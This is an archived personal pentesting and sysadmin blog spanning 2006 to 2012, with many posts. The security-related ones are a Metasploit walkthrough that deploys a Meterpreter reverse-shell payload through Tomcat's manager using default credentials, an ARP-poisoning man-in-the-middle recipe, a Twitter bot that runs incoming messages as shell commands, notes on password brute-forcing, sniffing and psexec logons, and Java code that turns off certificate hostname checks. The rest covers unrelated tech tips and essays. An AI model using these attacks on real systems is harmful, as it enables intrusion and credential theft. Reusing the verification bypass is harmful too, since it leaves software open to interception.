Javier's Blog

Tomcat Exploitation with Metasploit

2012-01-17T16:25:00.000-08:00

So if you have something like this in your tomcat/conf/tomcat-users.xml:

< ?xml version='1.0' encoding='utf-8'? >
< tomcat-users >
< role rolename="manager"/ >
< user username="tomcat" password="tomcat" roles="manager"/ >
< /tomcat-users >

You can use msf to pwn it:
./msfconsole
use exploit/multi/http/tomcat_mgr_deploy
set PASSWORD tomcat
set USERNAME tomcat
set RHOST 1.1.1.1
set RPORT 8080
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 2.2.2.2
show options
set TARGET 1
exploit

This works on apache-tomcat-5.5.35 (confirmed) and 6.x, probably 7.x too. Moral of the story: don't use tomcat-users.xml to authenticate users, i.e., you are saving a password in plain-text and you are probably using an easily guessable password...

Web frameworks and internet security

2011-10-28T15:53:00.000-07:00

Didn't know until recently that I could find my thesis so easily, here is a direct link to the SDSU library: http://libpac.sdsu.edu/record=b3732273~S0

Man-in-the-Middle Server Impersonation

2011-09-25T08:43:00.000-07:00

The Challenge
Over the years I’ve seen many presentations on Main-in-the-Middle (MitM) attacks via ARP poisoning and have found a number of tools that can do this, but I’ve never seen anyone present this technique targeting a specific server-client connection with the aim of testing the client side. Recently I was given the task to audit a piece of software that makes a secure connection (HTTPS) to a server and transfers data back and forward. This brings up a number of challenges: first and foremost is traffic redirection, i.e., getting in the middle, getting in the middle is trivial if the attack machine resides on the same network as the victim machine, any of these tools can perform ARP poisoning: Cain, Ettercap, Dsniff, etc. The second challenge is to impersonate a specific server, i.e., respond only to traffic destined to the server that is to be impersonated, and last but not least is to break or bypass SSL encryption.

I initially began testing by using Cain to perform ARP poisoning. Cain is a feature-full penetration testing application, which I used to perform the MitM attack. So being able to redirect traffic, the task of bypassing SSL can also be done with Cain right? Not so fast. Cain does have the ability to proxy SSL connections; it generates certificates for any SSL connection it sees and replies to the client with the generated certificates while at the same time connecting to the server side, relaying the connection. This worked great when I was testing SSL connections with a Web browser to a number of sites, but Cain failed when attempting to proxy connections for the server I was interested in impersonating. I am not sure exactly why Cain failed (“Couldn’t accept SSL connection from the client”), it may have to do with SSL cipher strength, or somehow the client knew that the certificate that Cain generated was invalid, whatever the case, Google was not much help. Even if this had worked, I wanted to reply to a specific outbound connection, but Cain simply allowed me to eavesdrop (snoop) on traffic, not to impersonate a server.

The second challenge of replying to a specific connection (server impersonation) seemed a bit tough at first since I’ve never heard of a tool to do this, or so I thought. I was a bit puzzled until I figured that all I need to do was to masquerade packets forwarding them to my target machine and reply to the connection as if the request was being made directly to my attack machine. Now what tool can I use to masquerade packets? Iptables? Of course, using Iptables I was able to reply only to a specific server from a specific client.

First we need to be able to forward packets:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then we need to masquerade packets:

iptables -t nat -A PREROUTING -i eth0 -p tcp -s victim -d server --dport 443 -j REDIRECT --to-port 443

So at this point I am redirecting all traffic from the victim through my attack machine and impersonating the target server. I used Ettercap (switched from Cain since Cain only runs on Windows) to redirect traffic through the attack machine via ARP poisoning, and Iptables to change the destination IP address of the target server. At this point, I setup Apache to make the SSL connection and server data to the client. I wrote a quick and dirty PHP script to fuzz the client, but Apache kept on giving me some out of memory errors when my responses got too big. So I then wrote a couple of one-line fuzzers that did not use Apache:

Fill up memory with AAA...:

ruby -e 'while true; print "A"; end' | nc -l -p 80

Fill up memory with random data:

ruby -e 'while true; print rand(127).chr; end' | nc -l -p 80

Now the only challenge was to feed this data through an SSL channel. While searching for other SSL proxies, since Cain proved to be the wrong tool, I ran into this little tool called Stunnel, universal SSL tunnel. By simply setting three options in its configuration file (client=no, accept=80, connect=443) I was able to setup a listener on port 443, which is redirects traffic to port 80.

Not too bad eh…

Assumptions

Attack machine is on the same network as victim machine
Client does not perform SSL verification

I always forget basename

2011-07-05T17:08:00.000-07:00

I always forget the name of this handy tool:

basename

Basename does more than return the base name of a file, i.e.,

basename /path/to/some/file.txt
file.txt

It also can give you the file without the extension, e.g.,

basename /path/to/some/file.txt .txt
file

This may seem pretty useless, but it is very handy when you are deep in some script doing something like:

for WAR in `ls *.war`; do
  DIR=`basename $WAR .war`
  mkdir $DIR
  cd $DIR 
  jar -xvf $WAR
done

I just thought I'd make this entry because I always seem to forget what the name of this simple tool is...

Just a Quick Paper on Computational Linguistics

2011-02-25T16:17:00.000-08:00

COMPUTATIONAL LINGUISTICS

Communication with computer systems is becoming increasingly natural. Although the technology depicted in current science fiction novels and films might seem farfetched, computer interaction via speech is becoming a reality. Many specialized systems have been developed for use by the disabled, which allows for interaction with a computer system via speech and other means. There are countless speech to text and text to speech applications which can be deployed on ordinary computers. Even most modern cellular phones have some type of speech enabled command capability. It is true that this technology is at its infancy and has a long way to go before we can seamlessly communicate with computer systems via speech. But recent advances in this technology, known as Computational Linguistics, seem to grasp at what someday will no longer be science fiction.

Computational Linguistics, a subdivision of the broader subject known as Natural Language Processing (NLP), deals with language based human-computer interaction, as well as computer aided language translation. Computational Linguistics is used in many applications, speech recognition, language translation, spelling and grammar checking, etc. The primary techniques now used in Computational Linguistics are statistical in nature and have brought significant advances to the field in recent years [1]. A system which is to seamlessly communicate via a natural language must have the following abilities: speech recognition, natural language understanding, natural language generation and speech synthesis, [3] all of which fall under Computational Linguistics. Other abilities such a system must have are information retrieval and extraction as well as inference; these are however, a bit out of the realm of Computational Linguistics. Given the complexity of natural languages, the task that computational linguists have taken up is more difficult than once thought.

STATISTICAL APPROACH

There is some debate about the approach that computational linguists have taken. Rational linguists, lead by Noam Chomsky, believe that statistical analysis has little to no chance at encompassing language entirely. Part of the bias against statistical analysis comes from the fact that early statistical NLP systems were extremely simple and could not begin to process the complexity of language. Another argument against statistical analysis is that computing the probability of sentences from a body of text would assign the same probability to grammatical and ungrammatical sentences [2]. Furthermore, there are sentences which are grammatically correct but are nonsensical in nature. Chomsky’s famous example of this is “Colorless green ideas sleep furiously,” a sentence which is grammatically correct but does not make sense. The argument here is that a system which is to communicate with humans must be able to decipher such a sentence as erroneous.

Computational linguists handle this issue by not worrying about which sentences are grammatically correct and which are not, instead, they make note of sentences which are likely to be said. Correct sentences are more likely to be said while incorrect sentences are less likely to be said. Often used sentences, regardless of whether they are considered correct or not, are considered part of the language as they convey some mutually agreed meaning. The earlier issue about the complexity of Computational Linguistic systems is no longer an issue since modern Computational Linguistic systems are nearly as complex as the models developed by rational linguists. The difference being that the former takes a statistical approach to learning and does not try to represent every part of the brain as we understand it.

AMBIGUITY

The main challenge computational linguists have taken up is the disambiguation of language. In the current state of affairs, computer systems learn from bodies of text, known as corpora [2], as they cannot observe the natural word around us and infer information as we do. The problem with this approach is that sentences often may be parsed in more ways than one. Sentences, for example, may be parsed so that their verb groups contain one word for one meaning, and multiple words for another meaning. Under these situations multiple parse trees may be generated, each parse tree having a slightly different meaning than similar trees. For long sentences, the number of applicable parse trees may be enormous [2].

Computational Linguists argue that by using a statistical NLP approach, where lexical and structural preferences in language are computed, the issue of numerous permutations of parse trees becomes moot. This approach aims at approximating the appropriate representation for a parse tree which conveys the meaning of the sentence. Lexical and structural preferences are learned or remembered by Computational Linguistic systems via N-grams.

MARKOV MODELS

N-grams are collections of words as they would appear in a natural language i.e. a sentence fraction where ‘n’ is the number of words in that fraction. For example, given the sentence “the fox jumped over the dog,” its corresponding trigram (3-gram) would consist of “the fox jumped”, “fox jumped over”, “jumped over the”, “over the dog.” These n-grams are built by parsing corpora and partitioned by having the previous (n - 1) words in common. A state sequence machine or automaton can be built from these n-gram partitions to identify the probabilities of one word or state to follow another. Using the statistical qualities of n-grams, the next word (n) may be predicted in a sentence fragment with relative accuracy. A variation of this model, where the state sequence is originally unknown, is referred to as the Hidden Markov Model (HMM). HMMs are the foundation to modern speech recognition systems [2] as well as other NLP applications.

AUGMENTED TRANSITION NETWORKS

Augmented Transition Networks (ATNs) build on the idea of using finite state machines in order to grammatically parse sentences. W. A. Wood in “Transition Network Grammars for Natural Language Analysis” claims that by adding a recursive mechanism to a finite state model, parsing can be achieved much more efficiently. Instead of building an automaton for a particular sentence, a collection of transition graphs are built. A grammatically correct sentence is parsed by reaching a final state in any state graph. Transitions between these graphs are simply subroutine calls from one state to any initial state on any graph in the network. A sentence is determined to be grammatically correct if a final state is reached by the last word in the sentence.

This model meets many of the goals set forth by the nature of language in that it captures the regularities of the language. That is, if there is a process that operates in a number of environments, the grammar should encapsulate the process in a single structure [4]. Such encapsulation not only simplifies the grammar, but has the added bonus of efficiency of operation. Another advantage of such a model is the ability to postpone decisions. Many grammars use guessing when an ambiguity comes up. This means that not enough is yet known about the sentence. By the use of recursion, ATNs solve this inefficiency by postponing decisions until more is known about a sentence [4].

CONCLUSION

As it can be clearly seen by this brief overview of Computational Linguistics, the field is complex and evolving. Although Computational Linguistics is at its infancy, much of the ground work has already been laid out. It is hard to determine whether a system with similar abilities to those of 3CPO (Star Wars) will ever become a reality, but it is clear that a subset of those abilities are already helping us with our everyday lives. Applications such as speech recognition and text translation are not perfect by any means, but are simply a subset of the capabilities future systems will have at their disposal.

REFERENCES

[1] Steven Abney. Statistical Methods and Linguistics. In: Judith Klavans and Philip Resnik (eds.), The Balancing Act: Combining Symbolic and Statistical Approaches to Language. The MIT Press, Cambridge, MA. 1996.

[2] Christopher D. Manning and Hinrich Schütze, 1999, Foundations of Statistical Natural Language Processing, MIT Press, Cambridge, MA.

[3] Daniel Jurafsky and James H. Martin, 2000, Speech and Language Processing, Prentice Hall, Upper Saddle River, New Jersey.

[4] Transition Network Grammars for Natural Language Analysis, W. A. Woods, Communications of the ACM, Volume 13 , Issue 10 (October 1970) Pages: 591 - 606, ISSN:0001-0782

We Won Capture the Flag

2010-12-05T21:06:00.000-08:00

TwittBot

2010-12-05T20:57:00.000-08:00

I got a bit bored during the SANS GIAC class so I decided to whip up a twitter bot. Nothing fancy, just a quick & dirty way to command a machine through twitter.

First, you have to register a new account which will house the application and register a new application at http://dev.twitter.com/apps once that is done, then make note of your API key, Consumer Secret, Access token and secret.

Second, get the required python packages: python-twitter & python-oauth2

hg clone http://python-twitter.googlecode.com/hg/ python-twitter
cd python-twitter/
python setup.py build
sudo python setup.py install 
git clone https://github.com/simplegeo/python-oauth2.git
cd python-oauth2/
python setup.py build
sudo python setup.py install

Third, execute the code below (python twitbot.py:


#!/usr/bin/python

import twitter, time, os

class TwitServ:
  api = None
  sleep_time=60*5
  def login(self):
    self.api = twitter.Api(consumer_key='***',
      consumer_secret='***',
      access_token_key='****',
      access_token_secret='****')

  def printFriends(self):
    friends = self.api.GetFriends()
    allfriends=''
    for f in friends:
      allfriends+=f.name + ' '
    print "All my friends are " +allfriends
    #print [u.name for u in users]
    #api.PostUpdates("I am Bot, hear me roar...")

  def getLastProcessedMsgId(self):
    f=open('lastmsgid', 'r')
    return f.readline()

  def saveLastMsgId(self, id):
    f=open('lastmsgid', 'w')
    f.write(str(id))
    f.close()

  def getLastMsg(self):
    dirmsgs=self.api.GetDirectMessages()
    print "Last message: " + dirmsgs[0].text
    return dirmsgs[0]

  # print str(lastmsg.id) + ' ' + str(lastmsgid)
  def reply(self):
    lastmsg=self.getLastMsg()
    if str(lastmsg.id) != self.getLastProcessedMsgId():
      cmd=lastmsg.text
      self.saveLastMsgId(lastmsg.id)
      result=os.popen(cmd).readlines()
      msg=""
      for i in result:
        msg+=i
      try:
        self.api.PostDirectMessage(lastmsg.sender_id, msg[:140])
        #self.api.PostUpdates(msg[:140]) # Use this if you want replies to be public
        print "Sending  messge to "+lastmsg.sender_id+": " + msg[:140]
      except twitter.TwitterError:
        print "Error sending message, possible duplicate message"
      self.saveLastMsgId(lastmsg.id)
    else:
      print "No new messages to process..."


  def serve(self):
    self.login()
    print "logged in..."
    self.printFriends()
    while True:
      self.reply()
      time.sleep(sleep_time)
    

if __name__ == "__main__":
  TwitServ().serve()

To command TwittBot simply send a direct msg to is:

d IamBot uname -a

Testing SSL Connection

2010-11-03T13:49:00.000-07:00

Sometimes you need to test a web server manually to see how the protocol behaves at lower levels. So you can do something like:

telnet 192.168.1.1 80
GET /index.html HTTP/1.0

But what if the only open port is HTTPS, then you can use this:

openssl s_client -connect 192.168.1.1:443
GET /index.html HTTP/1.0

BlackHat & Defcon: Heaven

2010-08-25T14:33:00.000-07:00

Airlink101 AR430W/DLINK DIR300 Installation Instructions (screens)

2010-05-06T15:17:00.000-07:00

Here the screenshot that this HOWTO is missing: http://www.dd-wrt.com/phpBB2/viewtopic.php?t=32594


fiero: $ telnet 192.168.20.81 9000
Trying 192.168.20.81...
Connected to 192.168.20.81.
Escape character is '^]'.

RedBoot> load ap61.ram
Using default protocol (TFTP)
Entry point: 0x800410bc, address range: 0x80041000-0x800680d8
RedBoot> go


Connection closed by foreign host.
fiero: $ telnet 192.168.1.1 9000
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
DD-WRT> fconfig -i
Initialize non-volatile configuration - continue (y/n)? y
Run script at boot: false
Use BOOTP for network configuration: true
Default server IP address: 
Console baud rate: 9600
GDB connection port: 9000
Force console for special debug messages: false
Network debug at boot time: false
Update RedBoot non-volatile configuration - continue (y/n)? y
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> fis init
About to initialize [format] FLASH image system - continue (y/n)? y
*** Initialize FLASH Image System
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> ip_address -h 192.168.1.23
IP: 192.168.1.1/255.255.255.0, Gateway: 0.0.0.0
Default server: 192.168.1.23
DD-WRT> load -r -b %{FREEMEMLO} ap61.rom
Using default protocol (TFTP)
Raw file loaded 0x80080000-0x800a8717, assumed entry at 0x80080000
DD-WRT> fis create -l 0x30000 -e 0xbfc00000 RedBoot
An image named 'RedBoot' exists - continue (y/n)? y
... Erase from 0xbfc00000-0xbfc30000: ...
... Program from 0x80080000-0x800a8718 at 0xbfc00000: ...
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> reset

Connection closed by foreign host.
fiero: $ 
fiero: $ telnet 192.168.1.1 9000
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
DD-WRT> ip_address -h 192.168.1.23
IP: 192.168.1.1/255.255.255.0, Gateway: 0.0.0.0
Default server: 192.168.1.23
DD-WRT> load -r -b 0x80041000 linux.bin 
Using default protocol (TFTP)
Raw file loaded 0x80041000-0x803dcfff, assumed entry at 0x80041000
DD-WRT> fis create linux

... Erase from 0xbfc30000-0xbffcc000: ..........................................................
... Program from 0x80041000-0x803dd000 at 0xbfc30000: ..........................................................
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> DD-WRT> fconfig boot_script true 
boot_script: Setting to true
Update RedBoot non-volatile configuration - continue (y/n)? y
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> fconfig boot_script_timeout 3 
boot_script_timeout: Setting to 3
Update RedBoot non-volatile configuration - continue (y/n)? y
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> fconfig bootp false 
bootp: Setting to false
Update RedBoot non-volatile configuration - continue (y/n)? y
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> fconfig
Run script at boot: true
Boot script: 
.. fis load -l linux
.. exec
Enter script, terminate with empty line
>> fis load -l linux
>> exec
>> 
Boot script timeout (1000ms resolution): 3
Use BOOTP for network configuration: false
Gateway IP address: 
Local IP address: 
Local IP address mask: 
Default server IP address: 
Console baud rate: 9600
GDB connection port: 9000
Force console for special debug messages: false
Network debug at boot time: false
Update RedBoot non-volatile configuration - continue (y/n)? y
... Erase from 0xbffe0000-0xbfff0000: .
... Program from 0x80ff0000-0x81000000 at 0xbffe0000: .
DD-WRT> reset

Connection closed by foreign host.

Web Frameworks and Internet Security, a Thesis

2010-04-14T13:20:00.000-07:00

Again, hopefully someone will find this useful.

Web Frameworks and Internet Security

The Internet is arguably the single most influential technology we have seen in the
last two decades. Our increasing dependence on the Internet and Web applications subjects us to attacks that are commonly misunderstood. Presented are the most common Web application vulnerabilities and the necessary mechanisms within Web frameworks that aid in protecting private data. The security mechanisms that aid in preventing Web based attacks are closely studied within this paper. Also, studied are the pitfalls encountered by developers when building Web applications and the ease with which framework security mechanisms can be applied to protect against known vulnerabilities.

Get the full paper here and feel free to leave comments below.

Evolutionary Fuzzing System

2010-04-14T12:34:00.000-07:00

Just thought I should post this before it disappears into the void that is my backups...

Evolutionary Fuzzing System is a pretty cool concept pioneered by Jared D. DeMott, et al, this paper shows a bit different approach to DeMott's using GPF (General Purpose Fuzzer) as a proof of concept.

Get the paper here: Evolutionary Fuzzing System
Get the modified GPF here: GPF-Mutate

Abstract: Evolutionary Negative Testing is an increasingly popular method for testing software whose source code may not be available. One of the first tools of this kind is the Evolutionary Fuzzing System. This paper presents an addition to the system called Mutation Reliant Evolutionary Fuzzer and explores possibilities for increasing code coverage and vulnerability discovery.

Setting up tomcat for openjms tunnel

2010-02-25T15:27:00.000-08:00

1. Create Tomcat keystore and key


keytool -genkey -dname "cn=example.com" -alias tomcat -keyalg RSA \
   -keystore $TOMCAT_HOME/keystore -keypass changeit -storepass \
   changeit

2. Export the public certificate


keytool -export -alias tomcat -keystore $TOMCAT_HOME/keystore -storepass \
   changeit -rfc -file tomcat.pub

3. Create client keystore and Trust (import) the Tomcat public key


keytool -import -alias tomcat -keystore openjms.keystore -storepass \
   changeit -file tomcat.pub  -noprompt

*. Repeat last step for client.keystore.

4. Don't forget to configure tomcat:


  <Connector port="443" protocol="HTTP/1.1" SSLEnabled="true"
               maxThreads="150" scheme="https" secure="true"
               clientAuth="false" sslProtocol="TLS"
                keystoreFile="/usr/local/apache-tomcat-6.0.20/keystore"
                truststoreFile="/usr/local/apache-tomcat-6.0.20/keystore"
                keystorePass="changeit" 
                truststorePass="changeit" />

5. And make sure you drop openjms-tunnel.war in the webapps directory

lx Branded Solais Zones

2010-01-28T17:44:00.000-08:00

Never knew how easy it was to setup a Linux branded zone under Solaris. Running Linux software on Solaris 10 has never been easier :).

Download CentOS-3.8-i386-bin1of*.iso to /path/to/isos and do the following:


# zonecfg -z CentOS
create -t SUNWlx
set autoboot=true
set zonepath=/zpool/zones/CentOS
add net
 set address=x.x.x.x/24
 set physical=e1000g0
 end
commit
exit
# zoneadm list -cv
# zoneadm -z CentOS install -d /path/to/isos core
# zoneadm list -cv
# zoneadm -z CentOS boot
# zlogin -C -e '#' CentOS

now just press #. to exit the shell

OS X Apache PHP

2010-01-08T10:23:00.000-08:00

I was pleasantly surprised to find out how easy it is to "use" Apache + PHP on OS X. That's right, no need to install it, it comes preinstalled. Just edit /private/etc/apache2/httpd.conf and uncomment the php_module line ('LoadModule php5_module'). Then go to System Preferences > Sharing, and enable Web Sharing.

Testing this is as easy as:


cat > ~/Sites/test.php
<? phpinfo(); ?>
^d

Then go to http://localhost/~username/test.php :)

Accepting certificates for OpenJMS HTTPS tunnel

2009-12-19T21:33:00.000-08:00

OpenJMS HTTPS tunnel can be a bit tough to setup because Java by default validates SSL certificates and of course the errors you get from OpenJMS are really not that helpful. E.g., "java.io.IOException: HTTPS hostname wrong: should be."

During development often self signed certificates are used, which Java will fail to validate. This can be bypassed with a few lines of code, it will force Java not to check the validity of a certificate:


  com.sun.net.ssl.HostnameVerifier hv=new com.sun.net.ssl.HostnameVerifier() {
      public boolean verify(String urlHostname, String certHostname) {
          logger.warn("Hostname: "+urlHostname
              +" does not match certificate: "+certHostname);
          return true;
      }
 };
 com.sun.net.ssl.HttpsURLConnection.setDefaultHostnameVerifier(hv);

Useful Links:

Error I was getting: java.io.IOException: HTTPS hostname wrong: should be
http://www.java-samples.com/showtutorial.php?tutorialid=211

How to import a certificate from file in Java using keytool
http://blog.spikesource.com/java_certificate_import.htm

Error I was getting: HTTPS hostname wrong
http://www.velocityreviews.com/forums/t129514-https-hostname-wrong.html

How to create certificates:
http://emo.sourceforge.net/cert-login-howto.html

Another SSL HOWTO:
http://www.openssl.org/docs/HOWTO/certificates.txt

OS X Global Variables

2009-12-08T08:50:00.001-08:00

Yes, even if /etc/launchd.conf does not exist:

---------------------
cat >> /etc/launchd.conf
setenv JAVA_HOME /System/Library/Frameworks/JavaVM.framework/Home
^d
---------------------

The Inventor of the Internet

2009-09-14T20:57:00.000-07:00

Today I had the pleasure of meeting Vint "The Father of the Internet" Cerf: http://en.wikipedia.org/wiki/Vint_Cerf

2009-08-06T20:28:00.000-07:00

Really kinda eye opening, funny, and embarrassing to some:


The very concept of "penetration testing" is fundamentally flawed.  The problem
with it is that the penetration tester has a limited set of targets they're
allowed to attack, while a real attacker can attack anything in order to gain
access to the site/box.  So if a site on a shared host is being tested, just
because site1.com is "secure" that does NOT in anyway mean that the server is
secure, because site2.com could easily be vulnerable to all sorts of simple
attacks.  The time constraint is another problem. A professional pentester with
a week or two to spend on a client's network may or may not get into
everything.  A real dedicated hacker making the slog who spends a month of
eight hour days WILL get into anything they target. You're lucky if it even
takes him that long, really.

http://r00tsecurity.org/files/zf05.txt

2009-07-25T15:06:00.000-07:00

The same-origin policy was designed to prevent an attacker from accessing data on a third-party site. This policy does not prevent requests from being
sent, it only prevents an attack from reading the data returned from the third-party server. Since CSRF attacks are the result of the requests sent, the same-origin policy does not protect against CSRF attacks.

Great paper on Cross-Site Request Forgery: http://citp.princeton.edu/csrf

Factory Picture in Palm Pre

2009-06-17T22:21:00.000-07:00

I guess it's good that they tested the camera, I am disappointed that I didn't get a picture of the nice person working on my Pre. Anyway, rooting the Palm Pre couldn't be easier, I think it will help them in the long run.

Quick Steps as per predev wiki:

Download the webOS image.
Rename this file to .zip, and extract it.
Untar resources/NovacomInstaller.pkg.tar.gz (tar -xzvf).
Run NovacomInstaller.pkg.
Click through the installer.
Put your Pre in DeveloperMode (upupdowndownleftrightleftrightbastart)
Connect to your Mac via USB cable. There is no need to select a mode, as it doesn't seem to matter.
cd /opt/nova/bin
./novaterm
At this point you should have root.

There you go:
Processor : ARMv7 Processor rev 3 (v7l)
BogoMIPS : 498.07
Features : swp half thumb fastmult vfp edsp
CPU implementer : 0x41

This is the first interesting thing I found so far:

Anyway, did you find a better picture?
Look in /var/log/hwtest/ted/pics/

Machine Thought

2009-05-21T18:39:00.001-07:00

As computer hardware and software have coevolved, whenever a new feature is required its implementation in both hardware and software always seems to bring the best results. Take virtualization for example, initial virtualization mechanisms were implemented in pure software models. It was not until the advent of this technology in hardware (e.g. Intel VT) that virtualization became more reliable and more efficient. Of course, software was also changed in order to accommodate this new hardware. In the current state of affairs virtualization is expanding and maturing as both hardware and software coevolve to meet the demands of its human overlords.

“Machine Thought,” I believe will come in the same way, the first glimpse of intelligence will come from a software model. This model will give us insight on how complex systems work and will spawn a number of inventions in hardware that will alleviate many of the flaws that the software model will suffer from. It is through the coevolution of both hardware and software that new intelligent systems will begin to be born. This may require that the line between software and hardware be blurred even further. It may be that the current materials with which hardware is built are not sufficient for expressing the systems that we want to build. New materials may come from biological and/or chemical constructs that may eventually allow other types of computation, maybe even lead to “thought” outside the human mind.

Rails Woes

2008-12-11T13:33:00.000-08:00

OK, I know I'm a bit rusty on RoR, but this is ridiculous...

I guess I wouldn't have been so bad, like 4 hours wasted, if there was decent documentation. Also, I know that Rails has gone through some recent changes. But, all I wanted to do is write a simple XML-RPC application. I've done it in the past and it has been fairly painless.

Here is some FYI in case you might want to do the same.

ActionWebServie has been removed and "replaced" with ActiveResource. "Replaced" does not mean 'replaced' as in there is no support for XML-RPC under ActiveResource.

Here is what you need to do in order to get ActionWebService working on Rails 2.

rake rails:freeze:edge
svn export http://dev.rubyonrails.org/svn/rails/ousted/actionwebservice/ vendor/rails/actionwebservice

edit environments.rb and add the following below Rails::Initializer.run:
config.load_paths += %W(
#{RAILS_ROOT}/app/apis
#{RAILS_ROOT}/vendor/rails/actionwebservice/lib
)

add the following at the end of the file:

require 'action_web_service'

And finally add this to test_helper.rb:

require 'action_web_service/test_invoke'

The people who make the best guns are not usually the people who are best at making bullet-proof vests.

2008-08-28T21:35:00.000-07:00

While having a beer with Ed Skoudis at Defcon 16, he shared an interesting idea he has been kicking around, something like "Exploit for the sake of exploiting, the bad guys do it, why can't we... with permission of course."

After the Defcon blur wore off, I followed up with him via email, I asked him if he could elaborate on that conversation, here's what he said:

"Well, let me start by analogy... The people who make the best guns are not usually the people who are best at making bullet-proof vests. Likewise, swordsmiths are familiar with armour so they can craft their wares to slice through it, but might not be able to actually manufacture or even design armor. Trying to maintain a career where you are the best of the best attacker and the best of the best defender is likely impossible.... at least for most of us mere mortals. Thus, you may be able to be a better attacker by focusing must of your attention to the attack and somewhat less to the defense. That way, you can be more lethal, mimicking the abilities of the more skilled bad guys, at least as compared to trying to maintain a 50/50 or even 30/70 balance between attack and defend like most infosec pros do.

So, by having some people spend more time on the offense, even though they are not evil, we might get a better understanding of our risks from it, from an overall industry perspective.

That's the idea."

With that being said, I would really like to know why us pen testers always get pulled in when some box needs to be locked down. I guess it's up to us to change the culture eh.

Sysadmin Notes

2008-06-19T20:28:00.000-07:00

Pingsweep of subnet:

# nmap -sP 10.0.0.1-255

Get a list of users on Windows:

> net use \\x.x.x.x\ipc$ "" /USER:""
> net users

What is the password policy:

> net accounts

Recover a lost password:

> enum -u Aministrator -f c:\dict.txt -D x.x.x.x

Logon remotely:

> psexec \\x.x.x.x -u Administrator cmd.exe

Transfer a file with netcat:

$ nc -l -p 6969 > file.txt
$ nc somehost 6969 < file.txt

Listen for passwords flying on the subnet:

# sudo dsniff

Reset the root password on an old server:

$ sshnuke 10.2.2.2 -rootpw-"Z1ON0101"

Makeshift remote desktop:

From server:

vncserver

you will enter password and the server will start running on port 6000 or so. From client:

xvncviewer

Tomcat

2008-06-13T08:53:00.000-07:00

Create a serlf signed SSL certificate for Tomcat.

mkdir ssl
cd ssl
openssl req -new -out REQ.pem -keyout KEY.pem
openssl req -x509 -in REQ.pem -key KEY.pem -out CERT.pem
openssl req -verify -in REQ.pem
openssl req -verify -in REQ.pem -key KEY.pem
openssl req -text -in REQ.pem

Backup old SSL key just in case something goes wrong

mkdir old_ssl
cp /usr/local/tomcat/.keystore old_ssl/keystore

Stop Tomcat

/etc/init.d/tomcat stop

Delete the Tomcat certificate from the keystore and install new one

sudo ln /usr/local/tomcat/.keystore /root/.keystore
sudo /usr/java/jdk1.6.0/bin/keytool -delete -alias tomcat
sudo /usr/java/jdk1.6.0/bin/keytool -import -v -trustcacerts -alias tomcat -file CERT.pem

Start Tomcat

sudo /etc/init.d/tomcat start

Fun with Numbers

2008-03-16T16:35:00.001-07:00


>>> n = ""
>>> for x in range(1,10):
...     n = n+str(x)
...     print "%s x 8 + %d = %d" % (n,x,(int(n) * 8 + x))
...
1 x 8 + 1 = 9
12 x 8 + 2 = 98
123 x 8 + 3 = 987
1234 x 8 + 4 = 9876
12345 x 8 + 5 = 98765
123456 x 8 + 6 = 987654
1234567 x 8 + 7 = 9876543
12345678 x 8 + 8 = 98765432
123456789 x 8 + 9 = 987654321
>>>
>>> n = ""
>>> for x in range(1,10):
...     n = n+str(x)
...     print "%s x 9 + %d = %d" % (n,(x+1),(int(n) * 9 + x+1))
...
...
1 x 9 + 2 = 11
12 x 9 + 3 = 111
123 x 9 + 4 = 1111
1234 x 9 + 5 = 11111
12345 x 9 + 6 = 111111
123456 x 9 + 7 = 1111111
1234567 x 9 + 8 = 11111111
12345678 x 9 + 9 = 111111111
123456789 x 9 + 10 = 1111111111
>>>
>>>
>>>
>>>
>>>
>>> n = ""
>>> r = range(2,10)
>>> r.reverse()
>>> for x in r:
...     n = n+str(x)
...     print "%s x 9 + %d = %d" % (n,(x-2),(int(n) * 9 + (x-2)) )
...
9 x 9 + 7 = 88
98 x 9 + 6 = 888
987 x 9 + 5 = 8888
9876 x 9 + 4 = 88888
98765 x 9 + 3 = 888888
987654 x 9 + 2 = 8888888
9876543 x 9 + 1 = 88888888
98765432 x 9 + 0 = 888888888

Square thumbnail with Python Image Library

2008-03-13T18:38:00.000-07:00

Every once in a while someone will walk up to me and ask, "how do you make a square thumbmail using PIL (Python Image Library)"? To this I say:


import Image

THUMB_SIZE = 80, 80
img = Image.open("someimge.jpg")
width, height = img.size

if width > height:
   delta = width - height
   left = int(delta/2)
   upper = 0
   right = height + left
   lower = height
else:
   delta = height - width
   left = 0
   upper = int(delta/2)
   right = width
   lower = width + upper

img = img.crop((left, upper, right, lower))
img.thumbnail(THUMB_SIZE, Image.ANTIALIAS)
img.save("someimge-thumb.jpg")

They usually walk away satisfied...

Links

2008-02-25T14:46:00.001-08:00

DVD Rip:
http://www.makeuseof.com/tag/2-step-dvd-to-pc-or-ipod-video-conversion-using-free-software/

SVN Automatic login under windows: Putty & TortoiseSVN

2006-09-17T21:05:00.000-07:00

TortoiseSVN is the best SVN client I've been able to find for Windows, at first glance, however, it might seem a bit annoying because it asks for your password for just about every operation.

In order to get rid of this annoying password popup, all we need to do is generate a public/private key using Putty and install your public key in your server. This of course assumes that you are running a SSH on your server and have already setup your SVN repository.

We can generate a private/public key using Putty's Key Generator, the defaults should suffice, first generate the keys then save the private and public key. The public key will also display on the top square of Putty's keygen, copy this key in it's entirety and paste it into your server's ~/.ssh/authorized_keys2 file.

